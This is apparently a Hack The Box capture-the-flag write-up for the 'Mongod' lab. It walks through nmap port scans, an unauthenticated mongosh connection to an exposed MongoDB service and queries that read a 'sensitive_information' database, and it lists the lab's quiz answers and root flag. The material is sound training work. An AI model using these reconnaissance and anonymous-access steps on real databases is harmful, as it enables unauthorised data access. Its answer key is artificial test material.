Mongod (Tier 0)

Description

  • Tier -> 0

  • Difficult -> Very Easy

  • OS -> Linux

  • Tags -> MongoDB / Databases / Reconnaissance Misconfiguration / Anonymous-Guest Access

https://app.hackthebox.com/starting-point?tier=0

Write-up

  • I started doing an initial port scan of the machine using Nmap

nmap 10.129.1.138 -p- -Pn --min-rate 2500 -oN scan.txt

  • With this, I answered the first question

Answer: 2

  • Then I did an exhaustive scan of the ports we found for get information about the running services

nmap 10.129.1.138 -p22,27017 -sVC -oN serv_scan.txt

  • With this and a little research, I answered the next questions

Answer: MongoDB 3.6.8

Answer: NoSQL

Answer: mongosh

Answer: show dbs

Answer: show collections

Answer: db.flag.find().pretty()

  • As we found a MongoDB database service running on port 27017, I tried connecting to the service using the utility mongosh and it worked successfully

mongosh mongodb://10.129.1.138:27017

  • Once inside, I checked for the existing databases and noticed a suspicious database named sensitive_information. I accessed it and filtered the information it contained using the keyword flag and got an object that contained this parameter, letting me know the root flag

test> show dbs
test> use sensitive_information
sensitive_information> db.flag.find().pretty()

  • With this, I got the root flag and pwned the machine

Answer: 1b6e6fb359e7c40241b6d431427ba6ea

PreviousPreignition (Tier 0)NextSynced (Tier 0)

Last updated